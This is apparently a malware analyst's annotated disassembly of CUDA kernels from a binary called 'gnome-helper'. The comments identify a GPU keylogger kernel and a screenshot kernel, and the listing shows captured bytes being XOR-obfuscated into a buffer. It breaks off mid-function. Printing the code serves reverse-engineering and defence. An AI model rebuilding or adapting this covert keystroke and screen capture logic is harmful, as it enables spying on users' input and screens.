// CQ -- Lightly commented disassembled source code from cuda kernels 
// CQ -- in gnome-helper binary.  Obtained by trimming ELF objects 
// CQ -- in hex editor and using cuobjdump and nvdisasm to acquire source
//	
	.headerflags	@"EF_CUDA_TEXMODE_UNIFIED EF_CUDA_64BIT_ADDRESS EF_CUDA_SM35 EF_CUDA_PTX_SM(EF_CUDA_SM35)"


//--------------------- .text._Z1kPhS_PmS_S_S_S_S_S_S_S0_ --------------------------
	.section	.text._Z1kPhS_PmS_S_S_S_S_S_S_S0_,"ax",@progbits
	.sectioninfo	@"SHI_REGISTERS=45"
	.align	64


// It appears the S_ represents an argument to the kernel, not the <<<grid,threads>>> but
// the regular arguments.  We have seven here, which matches with p0-p7, which I think
// corresponds to the keystrokes which may be held at once in USB, one modifier and up
// to six keystrokes at once.  This looks like the cuda portion of our keylogger.

        .global         _Z1kPhS_PmS_S_S_S_S_S_S_S0_
        .type           _Z1kPhS_PmS_S_S_S_S_S_S_S0_,@function
        .size           _Z1kPhS_PmS_S_S_S_S_S_S_S0_,(.L_83 - _Z1kPhS_PmS_S_S_S_S_S_S_S0_)
        .other          _Z1kPhS_PmS_S_S_S_S_S_S_S0_,@"STO_CUDA_ENTRY STV_DEFAULT"
_Z1kPhS_PmS_S_S_S_S_S_S_S0_:
.text._Z1kPhS_PmS_S_S_S_S_S_S_S0_:
        /*0008*/                   MOV R1, c[0x0][0x44];
        /*0010*/                   S2R R0, SR_CTAID.X;
        /*0018*/                   S2R R2, SR_TID.X;   // finding correct thread ID? looks boiler-plate
        /*0020*/                   IMUL R0, R0, c[0x0][0x28];
        /*0028*/                   I2I.S32.S32 R3, -R2;
        /*0030*/                   ISETP.NE.AND P0, PT, R0, R3, PT;  // boiler, but the isetp is a time-delay-able conditional
        /*0038*/               @P0 EXIT;
        /*0048*/                   MOV R4, c[0x0][0x150];
        /*0050*/                   MOV R5, c[0x0][0x154];
        /*0058*/                   MOV R6, c[0x0][0x158];
        /*0060*/                   LD.E.64 R10, [R4];
        /*0068*/                   MOV R2, c[0x0][0x140];
        /*0070*/                   MOV R3, c[0x0][0x144];
        /*0078*/                   MOV R7, c[0x0][0x15c];
        /*0088*/                   MOV R8, c[0x0][0x160];
        /*0090*/                   MOV R9, c[0x0][0x164];
        /*0098*/                   MOV R12, c[0x0][0x170];
        /*00a0*/                   MOV R13, c[0x0][0x174];
        /*00a8*/                   MOV R14, c[0x0][0x178];
        /*00b0*/                   MOV R15, c[0x0][0x17c];
        /*00b8*/                   IADD32I RZ.CC, R10, -0x98966b;
        /*00c8*/                   MOV R16, c[0x0][0x180];
        /*00d0*/                   ISETP.GT.U32.X.AND P0, PT, R11, RZ, PT;
        /*00d8*/                   MOV R10, c[0x0][0x168];
        /*00e0*/                   MOV R11, c[0x0][0x16c];
        /*00e8*/                   MOV R17, c[0x0][0x184];
        /*00f0*/                   MOV R18, c[0x0][0x188];
        /*00f8*/                   MOV R19, c[0x0][0x18c];
        /*0108*/                   MOV R20, c[0x0][0x190];
        /*0110*/                   MOV R21, c[0x0][0x194];
        /*0118*/               @P0 EXIT;
        /*0120*/                   MOV32I R0, 0x1;
        /*0128*/                   MOV R39, c[0x0][0x140];
        /*0130*/                   NOP;
        /*0138*/                   NOP;
.L_17:
        /*0148*/                   IADD R22.CC, R39, 0x2;
        /*0150*/                   LD.E.U8 R29, [R2];
        /*0158*/                   IADD.X R23, RZ, c[0x0][0x144];
        /*0160*/                   I2I.S32.S16 R32, R29;
        /*0168*/                   LD.E.U8 R24, [R22];
        /*0170*/                   ISETP.EQ.AND P0, PT, R32, RZ, PT;
        /*0178*/                   LD.E.U8 R25, [R22+0x1];
        /*0188*/                   LD.E.U8 R26, [R22+0x2];
        /*0190*/                   I2I.U32.U16 R31, R24;
        /*0198*/                   LD.E.U8 R27, [R22+0x3];
        /*01a0*/                   I2I.U32.U16 R33, R25;
        /*01a8*/                   LD.E.U8 R28, [R22+0x4];
        /*01b0*/                   LOP.AND R33, R33, 0xff;
        /*01b8*/                   LD.E.U8 R30, [R22+0x5];
        /*01c8*/                   I2I.U32.U16 R34, R26;
        /*01d0*/                   I2I.U32.U16 R35, R27;
        /*01d8*/                   LOP.AND R32, R31, 0xff;
        /*01e0*/                   I2I.U32.U16 R36, R28;
        /*01e8*/                   LOP.AND R34, R34, 0xff;
        /*01f0*/                   LOP.AND R35, R35, 0xff;
        /*01f8*/                   I2I.U32.U16 R37, R30;
        /*0208*/                   LOP.AND R36, R36, 0xff;
        /*0210*/                   I2I.U32.U16 R38, R29;
        /*0218*/                   LOP.AND R37, R37, 0xff;
        /*0220*/               @P0 BRA `(.L_2);
        /*0228*/                   LD.E.U8 R23, [R6];
        /*0230*/                   I2I.S32.S16 R22, R29;
        /*0238*/                   ISETP.NE.AND P0, PT, R22, R23, PT;
        /*0248*/               @P0 BRA `(.L_3);
.L_2:
        /*0250*/                   LOP.AND R22, R24, 0xff;
        /*0258*/                   I2I.S32.S16 R23, R22;
        /*0260*/                   ISETP.EQ.AND P0, PT, R23, RZ, PT;
        /*0268*/               @P0 BRA `(.L_4);
        /*0270*/                   LD.E.U8 R40, [R8];
        /*0278*/                   I2I.S32.S16 R23, R22;
        /*0288*/                   ISETP.NE.AND P0, PT, R23, R40, PT;
        /*0290*/               @P0 BRA `(.L_3);
.L_4:
        /*0298*/                   LOP.AND R23, R25, 0xff;
        /*02a0*/                   I2I.S32.S16 R31, R23;
        /*02a8*/                   ISETP.EQ.AND P0, PT, R31, RZ, PT;
        /*02b0*/               @P0 BRA `(.L_5);
        /*02b8*/                   LD.E.U8 R40, [R10];
        /*02c8*/                   I2I.S32.S16 R31, R23;
        /*02d0*/                   ISETP.NE.AND P0, PT, R31, R40, PT;
        /*02d8*/               @P0 BRA `(.L_3);
.L_5:
        /*02e0*/                   LOP.AND R31, R26, 0xff;
        /*02e8*/                   I2I.S32.S16 R40, R31;
        /*02f0*/                   ISETP.EQ.AND P0, PT, R40, RZ, PT;
        /*02f8*/               @P0 BRA `(.L_6);
        /*0308*/                   LD.E.U8 R41, [R12];
        /*0310*/                   I2I.S32.S16 R40, R31;
        /*0318*/                   ISETP.NE.AND P0, PT, R40, R41, PT;
        /*0320*/               @P0 BRA `(.L_3);
.L_6:
        /*0328*/                   LOP.AND R40, R27, 0xff;
        /*0330*/                   I2I.S32.S16 R41, R40;
        /*0338*/                   ISETP.EQ.AND P0, PT, R41, RZ, PT;
        /*0348*/               @P0 BRA `(.L_7);
        /*0350*/                   LD.E.U8 R42, [R14];
        /*0358*/                   I2I.S32.S16 R41, R40;
        /*0360*/                   ISETP.NE.AND P0, PT, R41, R42, PT;
        /*0368*/               @P0 BRA `(.L_3);
.L_7:
        /*0370*/                   LOP.AND R41, R28, 0xff;
        /*0378*/                   I2I.S32.S16 R42, R41;
        /*0388*/                   ISETP.EQ.AND P0, PT, R42, RZ, PT;
        /*0390*/               @P0 BRA `(.L_8);
        /*0398*/                   LD.E.U8 R43, [R16];
        /*03a0*/                   I2I.S32.S16 R42, R41;
        /*03a8*/                   ISETP.NE.AND P0, PT, R42, R43, PT;
        /*03b0*/               @P0 BRA `(.L_3);
.L_8:
        /*03b8*/                   LOP.AND R42, R30, 0xff;
        /*03c8*/                   I2I.S32.S16 R43, R42;
        /*03d0*/                   ISETP.EQ.AND P0, PT, R43, RZ, PT;
        /*03d8*/               @P0 BRA `(.L_9);
        /*03e0*/                   LD.E.U8 R44, [R18];
        /*03e8*/                   I2I.S32.S16 R43, R42;
        /*03f0*/                   ISETP.EQ.AND P0, PT, R43, R44, PT;
        /*03f8*/               @P0 BRA `(.L_9);
.L_3:
        /*0408*/                   ST.E.U8 [R6], R29;
        /*0410*/                   ST.E.U8 [R8], R24;
        /*0418*/                   ST.E.U8 [R10], R25;
        /*0420*/                   ST.E.U8 [R12], R26;
        /*0428*/                   ST.E.U8 [R14], R27;
        /*0430*/                   ST.E.U8 [R16], R28;
        /*0438*/                   ST.E.U8 [R18], R30;
        /*0448*/                   LD.E.64 R24, [R4];
        /*0450*/                   LD.E.64 R22, [R20];
        /*0458*/                   IADD R26.CC, R24, c[0x0][0x148];
        /*0460*/                   IADD.X R27, R25, c[0x0][0x14c];
        /*0468*/                   SHF.R.U64 R28, R22, 0x8, R23;
        /*0470*/                   ST.E.U8 [R26], R22;
        /*0478*/                   SHF.R.U64.HI R29, RZ, 0x8, R23;
        /*0488*/                   LD.E.64 R24, [R4];
        /*0490*/                   IADD R26.CC, R24, 0x1;
        /*0498*/                   IADD.X R27, R25, RZ;
        /*04a0*/                   IADD R24.CC, R24, c[0x0][0x148];
        /*04a8*/                   IADD.X R25, R25, c[0x0][0x14c];
        /*04b0*/                   ST.E.64 [R4], R26;
        /*04b8*/                   ST.E.U8 [R24+0x1], R28;
        /*04c8*/                   LD.E.64 R30, [R4];
        /*04d0*/                   SHF.R.U64 R28, R22, 0x10, R23;
        /*04d8*/                   SHF.R.U64.HI R29, RZ, 0x10, R23;
        /*04e0*/                   IADD R24.CC, R30, 0x1;
        /*04e8*/                   IADD.X R25, R31, RZ;
        /*04f0*/                   IADD R26.CC, R30, c[0x0][0x148];
        /*04f8*/                   ST.E.64 [R4], R24;
        /*0508*/                   IADD.X R27, R31, c[0x0][0x14c];
        /*0510*/                   ST.E.U8 [R26+0x1], R28;
        /*0518*/                   LD.E.64 R30, [R4];
        /*0520*/                   SHF.R.U64 R28, R22, 0x18, R23;
        /*0528*/                   SHF.R.U64.HI R29, RZ, 0x18, R23;
        /*0530*/                   IADD R24.CC, R30, 0x1;
        /*0538*/                   IADD.X R25, R31, RZ;
        /*0548*/                   IADD R26.CC, R30, c[0x0][0x148];
        /*0550*/                   IADD.X R27, R31, c[0x0][0x14c];
        /*0558*/                   ST.E.64 [R4], R24;
        /*0560*/                   ST.E.U8 [R26+0x1], R28;
        /*0568*/                   LD.E.64 R30, [R4];
        /*0570*/                   SHF.R.U64 R28, R22, 0x20, R23;
        /*0578*/                   SHF.R.U64.HI R29, RZ, 0x20, R23;
        /*0588*/                   IADD R24.CC, R30, 0x1;
        /*0590*/                   IADD.X R25, R31, RZ;
        /*0598*/                   IADD R26.CC, R30, c[0x0][0x148];
        /*05a0*/                   IADD.X R27, R31, c[0x0][0x14c];
        /*05a8*/                   ST.E.64 [R4], R24;
        /*05b0*/                   ST.E.U8 [R26+0x1], R28;
        /*05b8*/                   LD.E.64 R30, [R4];
        /*05c8*/                   SHF.R.U64 R28, R22, 0x28, R23;
        /*05d0*/                   SHF.R.U64.HI R29, RZ, 0x28, R23;
        /*05d8*/                   IADD R24.CC, R30, 0x1;
        /*05e0*/                   IADD.X R25, R31, RZ;
        /*05e8*/                   IADD R26.CC, R30, c[0x0][0x148];
        /*05f0*/                   IADD.X R27, R31, c[0x0][0x14c];
        /*05f8*/                   ST.E.64 [R4], R24;
        /*0608*/                   ST.E.U8 [R26+0x1], R28;
        /*0610*/                   LD.E.64 R30, [R4];
        /*0618*/                   SHF.R.U64 R28, R22, 0x30, R23;
        /*0620*/                   SHF.R.U64.HI R29, RZ, 0x30, R23;
        /*0628*/                   IADD R24.CC, R30, 0x1;
        /*0630*/                   IADD.X R25, R31, RZ;
        /*0638*/                   IADD R26.CC, R30, c[0x0][0x148];
        /*0648*/                   IADD.X R27, R31, c[0x0][0x14c];
        /*0650*/                   ST.E.64 [R4], R24;
        /*0658*/                   ST.E.U8 [R26+0x1], R28;
        /*0660*/                   LD.E.64 R30, [R4];
        /*0668*/                   SHF.R.U64 R22, R22, 0x38, R23;
        /*0670*/                   SHF.R.U64.HI R23, RZ, 0x38, R23;
        /*0678*/                   IADD R24.CC, R30, 0x1;
        /*0688*/                   IADD.X R25, R31, RZ;
        /*0690*/                   IADD R26.CC, R30, c[0x0][0x148];
        /*0698*/                   IADD.X R27, R31, c[0x0][0x14c];
        /*06a0*/                   ST.E.64 [R4], R24;
        /*06a8*/                   ST.E.U8 [R26+0x1], R22;
        /*06b0*/                   LD.E.64 R28, [R4];
        /*06b8*/                   LOP.XOR R26, R38, 0xde;
        /*06c8*/                   IADD R22.CC, R28, 0x2;
        /*06d0*/                   IADD.X R23, R29, RZ;
        /*06d8*/                   IADD R24.CC, R28, c[0x0][0x148];
        /*06e0*/                   ST.E.64 [R4], R22;
        /*06e8*/                   IADD.X R25, R29, c[0x0][0x14c];
        /*06f0*/                   ST.E.U8 [R24+0x1], R26;
        /*06f8*/                   LD.E.64 R22, [R4];
        /*0708*/                   LOP.XOR R26, R32, 0xde;
        /*0710*/                   IADD R24.CC, R22, 0x1;
        /*0718*/                   IADD.X R25, R23, RZ;
        /*0720*/                   IADD R22.CC, R22, c[0x0][0x148];
        /*0728*/                   ST.E.64 [R4], R24;
        /*0730*/                   IADD.X R23, R23, c[0x0][0x14c];
        /*0738*/                   ST.E.U8 [R22], R26;
        /*0748*/                   LD.E.64 R24, [R4];
        /*0750*/                   LOP.XOR R26, R33, 0xde;
        /*0758*/                   IADD R22.CC, R24, 0x1;
        /*0760*/                   IADD.X R23, R25, RZ;
        /*0768*/                   IADD R24.CC, R24, c[0x0][0x148];
        /*0770*/                   ST.E.64 [R4], R22;
        /*0778*/                   IADD.X R25, R25, c[0x0][0x14c];
        /*0788*/                   ST.E.U8 [R24], R26;
        /*0790*/                   LD.E.64 R22, [R4];
        /*0798*/                   LOP.XOR R26, R34, 0xde;
        /*07a0*/                   IADD R24.CC, R22, 0x1;
        /*07a8*/                   IADD.X R25, R23, RZ;
        /*07b0*/                   IADD R22.CC, R22, c[0x0][0x148];
        /*07b8*/                   ST.E.64 [R4], R24;
        /*07c8*/                   IADD.X R23, R23, c[0x0][0x14c];
        /*07d0*/                   ST.E.U8 [R22], R26;
        /*07d8*/                   LD.E.64 R24, [R4];
        /*07e0*/                   LOP.XOR R26, R35, 0xde;
        /*07e8*/                   IADD R22.CC, R24, 0x1;
        /*07f0*/                   IADD.X R23, R25, RZ;
        /*07f8*/                   IADD R24.CC, R24, c[0x0][0x148];
        /*0808*/                   ST.E.64 [R4], R22;
        /*0810*/                   IADD.X R25, R25, c[0x0][0x14c];
        /*0818*/                   ST.E.U8 [R24], R26;
        /*0820*/                   LD.E.64 R22, [R4];
        /*0828*/                   LOP.XOR R26, R36, 0xde;
        /*0830*/                   IADD R24.CC, R22, 0x1;
        /*0838*/                   IADD.X R25, R23, RZ;
        /*0848*/                   IADD R22.CC, R22, c[0x0][0x148];
        /*0850*/                   ST.E.64 [R4], R24;
        /*0858*/                   IADD.X R23, R23, c[0x0][0x14c];
        /*0860*/                   ST.E.U8 [R22], R26;
        /*0868*/                   LD.E.64 R24, [R4];
        /*0870*/                   LOP.XOR R26, R37, 0xde;
        /*0878*/                   IADD R22.CC, R24, 0x1;
        /*0888*/                   IADD.X R23, R25, RZ;
        /*0890*/                   IADD R24.CC, R24, c[0x0][0x148];
        /*0898*/                   IADD.X R25, R25, c[0x0][0x14c];
        /*08a0*/                   ST.E.64 [R4], R22;
        /*08a8*/                   ST.E.U8 [R24], R26;
        /*08b0*/                   BRA `(.L_10);

// This next set of branches appears to handle the different keystokes
// If they exist, save them. 
// RZ must be register with value of 0
// as the predicate is if not equal to 0 
.L_9:
        /*08b8*/                   I2I.S32.S16 R24, R29;
        /*08c8*/                   ISETP.NE.AND P0, PT, R24, RZ, PT;
        /*08d0*/               @P0 BRA `(.L_11);
        /*08d8*/                   LD.E.U8 R24, [R6];
        /*08e0*/                   ISETP.EQ.AND P0, PT, R24, RZ, PT;
        /*08e8*/              @!P0 ST.E.U8 [R6], RZ;
.L_11:
        /*08f0*/                   I2I.S32.S16 R22, R22;
        /*08f8*/                   ISETP.NE.AND P0, PT, R22, RZ, PT;
        /*0908*/               @P0 BRA `(.L_12);
        /*0910*/                   LD.E.U8 R22, [R8];
        /*0918*/                   ISETP.EQ.AND P0, PT, R22, RZ, PT;
        /*0920*/              @!P0 ST.E.U8 [R8], RZ;
.L_12:
        /*0928*/                   I2I.S32.S16 R22, R23;
        /*0930*/                   ISETP.NE.AND P0, PT, R22, RZ, PT;
        /*0938*/               @P0 BRA `(.L_13);
        /*0948*/                   LD.E.U8 R22, [R10];
        /*0950*/                   ISETP.EQ.AND P0, PT, R22, RZ, PT;
        /*0958*/              @!P0 ST.E.U8 [R10], RZ;
.L_13:
        /*0960*/                   I2I.S32.S16 R22, R31;
        /*0968*/                   ISETP.NE.AND P0, PT, R22, RZ, PT;
        /*0970*/               @P0 BRA `(.L_14);
        /*0978*/                   LD.E.U8 R22, [R12];
        /*0988*/                   ISETP.EQ.AND P0, PT, R22, RZ, PT;
        /*0990*/              @!P0 ST.E.U8 [R12], RZ;
.L_14:
        /*0998*/                   I2I.S32.S16 R22, R40;
        /*09a0*/                   ISETP.NE.AND P0, PT, R22, RZ, PT;
        /*09a8*/               @P0 BRA `(.L_15);
        /*09b0*/                   LD.E.U8 R22, [R14];
        /*09b8*/                   ISETP.EQ.AND P0, PT, R22, RZ, PT;
        /*09c8*/              @!P0 ST.E.U8 [R14], RZ;
.L_15:
        /*09d0*/                   I2I.S32.S16 R22, R41;
        /*09d8*/                   ISETP.NE.AND P0, PT, R22, RZ, PT;
        /*09e0*/               @P0 BRA `(.L_16);
        /*09e8*/                   LD.E.U8 R22, [R16];
        /*09f0*/                   ISETP.EQ.AND P0, PT, R22, RZ, PT;
        /*09f8*/              @!P0 ST.E.U8 [R16], RZ;
.L_16:
        /*0a08*/                   I2I.S32.S16 R22, R42;
        /*0a10*/                   ISETP.NE.AND P0, PT, R22, RZ, PT;
        /*0a18*/               @P0 BRA `(.L_10);
        /*0a20*/                   LD.E.U8 R22, [R18];
        /*0a28*/                   ISETP.EQ.AND P0, PT, R22, RZ, PT;
        /*0a30*/              @!P0 ST.E.U8 [R18], RZ;
.L_10:
        /*0a38*/                   ISETP.EQ.AND P0, PT, R0, 0x1f4, PT;
        /*0a48*/               @P0 EXIT;
        /*0a50*/                   IADD R0, R0, 0x1;
        /*0a58*/                   BRA `(.L_17);
.L_18:
        /*0a60*/                   BRA `(.L_18);
.L_83:



// Here is our screenshot kernel, which looks like it takes just
// one argument.  That also goes with our source fragment. 
// From the source fragment it appears that this kernel uses pinned memory, 
// ie the transfer from host to device does not require calls
// to cudaMemcpy it uses DMA.  
// Possible this DMA is accessed by a kernel hook which I have not found?

//--------------------- .text._Z1sPhPmS_jS0_      --------------------------
	.section	.text._Z1sPhPmS_jS0_,"ax",@progbits
	.sectioninfo	@"SHI_REGISTERS=24"
	.align	64




        .global         _Z1sPhPmS_jS0_
        .type           _Z1sPhPmS_jS0_,@function
        .size           _Z1sPhPmS_jS0_,(.L_84 - _Z1sPhPmS_jS0_)
        .other          _Z1sPhPmS_jS0_,@"STO_CUDA_ENTRY STV_DEFAULT"
_Z1sPhPmS_jS0_:
.text._Z1sPhPmS_jS0_:
        /*0008*/                   MOV R1, c[0x0][0x44];
        /*0010*/                   S2R R0, SR_CTAID.X;  // thread/grid?
        /*0018*/                   ISUB R1, R1, 0x8;
        /*0020*/                   S2R R2, SR_TID.X; // thread/grid?
        /*0028*/                   IMUL R0, R0, c[0x0][0x28];
        /*0030*/                   I2I.S32.S32 R3, -R2;
        /*0038*/                   IADD R2.CC, R1, c[0x0][0x24];
        /*0048*/                   ISETP.NE.AND P0, PT, R0, R3, PT; // similar to before?
        /*0050*/                   P2R R3, PR, RZ, 0xf000;
        /*0058*/               @P0 EXIT;
        /*0060*/                   MOV R16, c[0x0][0x148];
        /*0068*/                   MOV R17, c[0x0][0x14c];
        /*0070*/                   LD.E.64 R4, [R16];
        /*0078*/                   MOV32I R22, 32@lo($str);
        /*0088*/                   IADD R6.CC, R4, c[0x0][0x140];
        /*0090*/                   MOV32I R23, 32@hi($str);
        /*0098*/                   MOV R4, c[0x0][0x160];
        /*00a0*/                   IADD.X R7, R5, c[0x0][0x144];
        /*00a8*/                   MOV R5, c[0x0][0x164];
        /*00b0*/                   LD.E.64 R18, [R4];
        /*00b8*/                   ISUB R21, R2, c[0x0][0x24];
        /*00c8*/                   ST.E.U8 [R6], R18;
        /*00d0*/                   LD.E.64 R4, [R16];
        /*00d8*/                   IADD R4.CC, R4, c[0x0][0x140];
        /*00e0*/                   IADD.X R5, R5, c[0x0][0x144];
        /*00e8*/                   R2P PR, R3, 0xf000;
        /*00f0*/                   LD.E.U8 R0, [R4];
        /*00f8*/                   IADD.X R20, RZ, RZ;
        /*0108*/                   MOV R6, R2;
        /*0110*/                   MOV R7, R20;
        /*0118*/                   MOV R4, R22;
        /*0120*/                   MOV R5, R23;
        /*0128*/                   STL [R21], R0;     // store value in r0 to address r21 (local?) arg to vprintf?
        /*0130*/                   JCAL `(vprintf);   // This must be our window full of little numbers
        /*0138*/                   LD.E.64 R4, [R16];
        /*0148*/                   SHF.R.U64 R10, R18, 0x8, R19;
        /*0150*/                   SHF.R.U64.HI R11, RZ, 0x8, R19;
        /*0158*/                   IADD R6.CC, R4, 0x1;
        /*0160*/                   IADD.X R7, R5, RZ;
        /*0168*/                   IADD R8.CC, R4, c[0x0][0x140];
        /*0170*/                   IADD.X R9, R5, c[0x0][0x144];
        /*0178*/                   ST.E.64 [R16], R6;
        /*0188*/                   ST.E.U8 [R8+0x1], R10;
        /*0190*/                   MOV R7, R20;
        /*0198*/                   LD.E.64 R4, [R16];
        /*01a0*/                   IADD R8.CC, R4, c[0x0][0x140];
        /*01a8*/                   MOV R6, R2;
        /*01b0*/                   IADD.X R9, R5, c[0x0][0x144];
        /*01b8*/                   LD.E.U8 R0, [R8];
        /*01c8*/                   MOV R4, R22;
        /*01d0*/                   MOV R5, R23;
        /*01d8*/                   STL [R21], R0;
        /*01e0*/                   JCAL `(vprintf); // More printing
        /*01e8*/                   LD.E.64 R4, [R16];
        /*01f0*/                   SHF.R.U64 R10, R18, 0x10, R19;
        /*01f8*/                   SHF.R.U64.HI R11, RZ, 0x10, R19;
        /*0208*/                   IADD R6.CC, R4, 0x1;
        /*0210*/                   IADD.X R7, R5, RZ;
        /*0218*/                   IADD R8.CC, R4, c[0x0][0x140];
        /*0220*/                   IADD.X R9, R5, c[0x0][0x144];
        /*0228*/                   ST.E.64 [R16], R6;
        /*0230*/                   ST.E.U8 [R8+0x1], R10;
        /*0238*/                   MOV R7, R20;
        /*0248*/                   LD.E.64 R4, [R16];
        /*0250*/                   IADD R8.CC, R4, c[0x0][0x140];
        /*0258*/                   MOV R6, R2;
        /*0260*/                   IADD.X R9, R5, c[0x0][0x144];
        /*0268*/                   MOV R4, R22;
        /*0270*/                   LD.E.U8 R0, [R8];
        /*0278*/                   MOV R5, R23;
        /*0288*/                   STL [R21], R0;
        /*0290*/                   JCAL `(vprintf); // more printing
        /*0298*/                   LD.E.64 R4, [R16];
        /*02a0*/                   SHF.R.U64 R10, R18, 0x18, R19;
        /*02a8*/                   SHF.R.U64.HI R11, RZ, 0x18, R19;
        /*02b0*/                   IADD R6.CC, R4, 0x1;
        /*02b8*/                   IADD.X R7, R5, RZ;
        /*02c8*/                   IADD R8.CC, R4, c[0x0][0x140];
        /*02d0*/                   IADD.X R9, R5, c[0x0][0x144];
        /*02d8*/                   ST.E.64 [R16], R6;
        /*02e0*/                   ST.E.U8 [R8+0x1], R10;
        /*02e8*/                   MOV R7, R20;
        /*02f0*/                   LD.E.64 R4, [R16];
        /*02f8*/                   IADD R8.CC, R4, c[0x0][0x140];
        /*0308*/                   MOV R6, R2;
        /*0310*/                   IADD.X R9, R5, c[0x0][0x144];
        /*0318*/                   MOV R4, R22;
        /*0320*/                   LD.E.U8 R0, [R8];
        /*0328*/                   MOV R5, R23;
        /*0330*/                   STL [R21], R0;
        /*0338*/                   JCAL `(vprintf); // more printing
        /*0348*/                   LD.E.64 R4, [R16];
        /*0350*/                   SHF.R.U64 R10, R18, 0x20, R19;
        /*0358*/                   SHF.R.U64.HI R11, RZ, 0x20, R19;
        /*0360*/                   IADD R6.CC, R4, 0x1;
        /*0368*/                   IADD.X R7, R5, RZ;
        /*0370*/                   IADD R8.CC, R4, c[0x0][0x140];
        /*0378*/                   ST.E.64 [R16], R6;
        /*0388*/                   IADD.X R9, R5, c[0x0][0x144];
        /*0390*/                   MOV R7, R20;
        /*0398*/                   ST.E.U8 [R8+0x1], R10;
        /*03a0*/                   MOV R6, R2;
        /*03a8*/                   LD.E.64 R4, [R16];
        /*03b0*/                   IADD R8.CC, R4, c[0x0][0x140];
        /*03b8*/                   IADD.X R9, R5, c[0x0][0x144];
        /*03c8*/                   MOV R4, R22;
        /*03d0*/                   LD.E.U8 R0, [R8];
        /*03d8*/                   MOV R5, R23;
        /*03e0*/                   STL [R21], R0;
        /*03e8*/                   JCAL `(vprintf);   // printing
        /*03f0*/                   LD.E.64 R4, [R16];
        /*03f8*/                   SHF.R.U64 R10, R18, 0x28, R19;
        /*0408*/                   SHF.R.U64.HI R11, RZ, 0x28, R19;
        /*0410*/                   IADD R6.CC, R4, 0x1;
        /*0418*/                   IADD.X R7, R5, RZ;
        /*0420*/                   IADD R8.CC, R4, c[0x0][0x140];
        /*0428*/                   IADD.X R9, R5, c[0x0][0x144];
        /*0430*/                   ST.E.64 [R16], R6;
        /*0438*/                   ST.E.U8 [R8+0x1], R10;
        /*0448*/                   MOV R7, R20;
        /*0450*/                   LD.E.64 R4, [R16];
        /*0458*/                   IADD R8.CC, R4, c[0x0][0x140];
        /*0460*/                   MOV R6, R2;
        /*0468*/                   IADD.X R9, R5, c[0x0][0x144];
        /*0470*/                   MOV R4, R22;
        /*0478*/                   LD.E.U8 R0, [R8];
        /*0488*/                   MOV R5, R23;
        /*0490*/                   STL [R21], R0;
        /*0498*/                   JCAL `(vprintf);  // printing
        /*04a0*/                   LD.E.64 R4, [R16];
        /*04a8*/                   SHF.R.U64 R10, R18, 0x30, R19;
        /*04b0*/                   SHF.R.U64.HI R11, RZ, 0x30, R19;
        /*04b8*/                   IADD R6.CC, R4, 0x1;
        /*04c8*/                   IADD.X R7, R5, RZ;
        /*04d0*/                   IADD R8.CC, R4, c[0x0][0x140];
        /*04d8*/                   IADD.X R9, R5, c[0x0][0x144];
        /*04e0*/                   ST.E.64 [R16], R6;
        /*04e8*/                   ST.E.U8 [R8+0x1], R10;
        /*04f0*/                   MOV R7, R20;
        /*04f8*/                   LD.E.64 R4, [R16];
        /*0508*/                   IADD R8.CC, R4, c[0x0][0x140];
        /*0510*/                   MOV R6, R2;
        /*0518*/                   IADD.X R9, R5, c[0x0][0x144];
        /*0520*/                   MOV R4, R22;
        /*0528*/                   LD.E.U8 R0, [R8];
        /*0530*/                   MOV R5, R23;
        /*0538*/                   STL [R21], R0;
        /*0548*/                   JCAL `(vprintf);  // printing
        /*0550*/                   LD.E.64 R4, [R16];
        /*0558*/                   SHF.R.U64 R10, R18, 0x38, R19;
        /*0560*/                   SHF.R.U64.HI R11, RZ, 0x38, R19;
        /*0568*/                   IADD R6.CC, R4, 0x1;
        /*0570*/                   IADD.X R7, R5, RZ;
        /*0578*/                   IADD R8.CC, R4, c[0x0][0x140];
        /*0588*/                   IADD.X R9, R5, c[0x0][0x144];
        /*0590*/                   ST.E.64 [R16], R6;
        /*0598*/                   ST.E.U8 [R8+0x1], R10;
        /*05a0*/                   MOV R7, R20;
        /*05a8*/                   LD.E.64 R4, [R16];
        /*05b0*/                   IADD R8.CC, R4, c[0x0][0x140];
        /*05b8*/                   IADD.X R9, R5, c[0x0][0x144];
        /*05c8*/                   MOV R4, R22;
        /*05d0*/                   LD.E.U8 R0, [R8];
        /*05d8*/                   MOV R5, R23;
        /*05e0*/                   MOV R6, R2;
        /*05e8*/                   STL [R21], R0;
        /*05f0*/                   JCAL `(vprintf);  // printing
        /*05f8*/                   LD.E.64 R2, [R16];
        /*0608*/                   MOV R0, c[0x0][0x158];
        /*0610*/                   IADD R0, R0, -0x1;
        /*0618*/                   IADD R4.CC, R2, 0x1;
        /*0620*/                   ISETP.LT.AND P0, PT, R0, RZ, PT;
        /*0628*/                   IADD.X R5, R3, RZ;
        /*0630*/                   ST.E.64 [R16], R4;
        /*0638*/               @P0 EXIT;
        /*0648*/                   ISET.LT.AND R2, R0, RZ, PT;
        /*0650*/                   IADD R8.CC, R0, c[0x0][0x150];
        /*0658*/                   IADD R0, R0, -0x1;
        /*0660*/                   IADD.X R9, R2, c[0x0][0x154];
        /*0668*/                   IADD R6.CC, R4, 0x1;
        /*0670*/                   LD.E.U8 R2, [R8];
        /*0678*/                   IADD.X R7, R5, RZ;
        /*0688*/                   IADD R4.CC, R4, c[0x0][0x140];
        /*0690*/                   ST.E.64 [R16], R6;
        /*0698*/                   ISETP.GT.AND P0, PT, R0, -0x1, PT;
        /*06a0*/                   IADD.X R5, R5, c[0x0][0x144];
        /*06a8*/                   LOP.XOR R2, R2, 0xad;
        /*06b0*/                   ST.E.U8 [R4], R2;
        /*06b8*/               @P0 BRA `(.L_19);
.L_23:
        /*06c8*/                   MOV RZ, RZ;
        /*06d0*/                   EXIT;
.L_19:
        /*06d8*/                   IADD R2, R0, 0x1;
        /*06e0*/                   ISETP.GT.AND P0, PT, R2, 0x1, PT;
        /*06e8*/              @!P0 BRA `(.L_20);
        /*06f0*/                   IADD R3, R0, -0x1;
        /*06f8*/                   NOP;
.L_21:
        /*0708*/                   LD.E.64 R8, [R16];
        /*0710*/                   ISET.LT.AND R2, R0, RZ, PT;
        /*0718*/                   IADD R4.CC, R0, c[0x0][0x150];
        /*0720*/                   IADD.X R5, R2, c[0x0][0x154];
        /*0728*/                   LD.E.U8 R2, [R4];
        /*0730*/                   IADD R6.CC, R8, 0x1;
        /*0738*/                   IADD.X R7, R9, RZ;
        /*0748*/                   IADD R8.CC, R8, c[0x0][0x140];
        /*0750*/                   IADD R4, R0, -0x1;
